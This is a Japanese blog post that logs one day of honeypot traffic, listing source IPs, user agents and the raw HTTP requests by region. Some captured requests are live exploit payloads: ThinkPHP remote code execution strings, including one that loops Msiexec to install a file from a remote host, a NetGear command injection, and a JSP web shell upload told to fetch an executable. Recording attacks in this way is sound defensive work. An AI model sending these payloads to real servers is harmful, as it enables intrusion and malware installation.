コンニチハレバレトシタアオゾラ

つれづれなるままに、日暮らし、ぶろぐにむかひて、心にうつりゆくよしなしごとを、そこはかとなく書きつくれば、

2019/10/06 ハニーポット(仮) 観測記録

honeypot

ハニーポット(仮) 観測記録 2019/10/06分です。

特徴
Region:AP

NetGear製品の脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
Gh0stRATのような動き
を確認しました。

Region:US

HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
jspファイルを狙ったアクセス
を確認しました。

Region:EU

ThinkPHPの脆弱性を狙うアクセス
を確認しました。

アクセス数推移

AP:総アクセス数:40 (前日比:-8)
US:総アクセス数:129 (前日比:+109)
EU:総アクセス数:19 (前日比:-16)

都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。

Region:AP

送信元IPアドレス一覧

件数 送信元IPアドレス
1 111.11.101.46 China
2 111.61.77.228 China
2 122.169.229.236 India
1 122.224.88.26 China
2 123.252.218.38 India
2 14.152.90.89 China
2 14.185.64.121 Vietnam
4 148.70.56.154 China
2 185.31.163.237 Russia
2 192.186.5.85 United States
1 2.234.173.57 Italy
1 2.38.205.58 Italy
2 254.188.21.177 -
4 45.40.204.173 China
2 47.244.5.202 China
2 58.237.78.166 South Korea
2 60.216.248.90 China
2 61.175.240.62 China
1 66.240.205.34 United States
2 86.105.81.2 Republic of Moldova
1 87.197.136.28 Slovakia

UserAgent一覧

件数 UserAgent
2 -
2 curl/7.55.1
2 Go-http-client/1.1
3 Hi
21 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
2 Mozilla/5.0
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
6 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数 Method Request Protocol
1 GET /index.php HTTP/1.1
1 GET /LoginPage.do HTTP/1.1
3 GET /Pages/login.htm HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
10 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/&currentsetting.htm=1 HTTP/1.1
10 GET /?s=index%2F%5Cthink%5Capp%2Finvokefunction&function=call_user_func_array&vars%5B0%5D=system&vars%5B1%5D%5B%5D=mshta.exe%20vbscript:createobject(\"wscript.shell\").run(\"Cmd.exe%20/c%20for%20/l%20%i%20in%20(1,1,99)%20do%20(Msiexec%20/i%20http://Op[.]Cnazb[.]Xyz/PHP2.jpg%20/Q)\",0)(window.close)
2 GET /TP/index.php HTTP/1.1
2 GET /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
2 GET /TP/public/index.php HTTP/1.1
1 GET /webdav/ HTTP/1.1
1 Gh0st\xad
2 POST /images.php HTTP/1.1
2 POST /TP/index.php?s=captcha HTTP/1.1
1 PROPFIND / HTTP/1.1
Region:US

送信元IPアドレス一覧

件数 送信元IPアドレス
1 168.181.153.17 Brazil
1 172.104.242.173 United States
6 188.156.84.49 Hungary
1 190.129.162.66 Bolivia
1 220.200.159.252 China
1 221.191.47.215 Japan
4 223.113.12.238 China
1 23.95.82.42 United States
1 43.226.152.51 China
1 45.134.146.16 Germany
10 49.235.56.52 China
101 68.183.201.217 United States

UserAgent一覧

件数 UserAgent
2 -
1 Go-http-client/1.1
6 Hi
1 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
4 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
1 Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; The World)
4 Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
101 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)

リクエスト内容一覧

件数 Method Request Protocol
1 -
1 GET /elrekt.php HTTP/1.1
1 GET /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
1 GET http://www[.]google[.]com/ HTTP/1.0
1 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET ../../mnt/custom/ProductDefinition HTTP
6 GET /Pages/login.htm HTTP/1.1
101 GET /phpmyadmin/ HTTP/1.1
1 GET /public/index.php HTTP/1.1
4 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 HEAD /FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1&address=http://fky[.]dfg45dfg45[.]best/download.exe HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 PUT /FxCodeShell.jsp%20 HTTP/1.1
1 PUT /FxCodeShell.jsp::$DATA HTTP/1.1
1 PUT /FxCodeShell.jsp/ HTTP/1.1
Region:EU

送信元IPアドレス一覧

件数 送信元IPアドレス
1 103.207.49.251 China
2 104.211.216.163 United States
1 114.242.146.156 China
2 119.52.111.71 China
1 185.254.120.20 Russia
1 185.31.163.237 Russia
10 49.235.56.52 China
1 84.51.18.150 Turkey

UserAgent一覧

件数 UserAgent
1 -
1 curl/7.55.1
1 Go-http-client/1.1
3 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)
2 Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
9 Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
2 python-requests/2.22.0

リクエスト内容一覧

件数 Method Request Protocol
1 GET /elrekt.php HTTP/1.1
1 GET /html/public/index.php HTTP/1.1
2 GET /index.php HTTP/1.1
1 GET /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /phpmyadmin HTTP/1.1
1 GET /phpmyadmin/ HTTP/1.1
1 GET /phpmyadmin/index.php HTTP/1.1
1 GET /public/index.php HTTP/1.1
3 GET /public/index.php?s=index\/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 HTTP/1.1
1 GET /thinkphp/html/public/index.php HTTP/1.1
1 GET /TP/html/public/index.php HTTP/1.1
1 GET /TP/index.php HTTP/1.1
1 GET /TP/public/index.php HTTP/1.1
1 POST /images.php HTTP/1.1
1 POST /index.php?s=captcha HTTP/1.1
1 \x03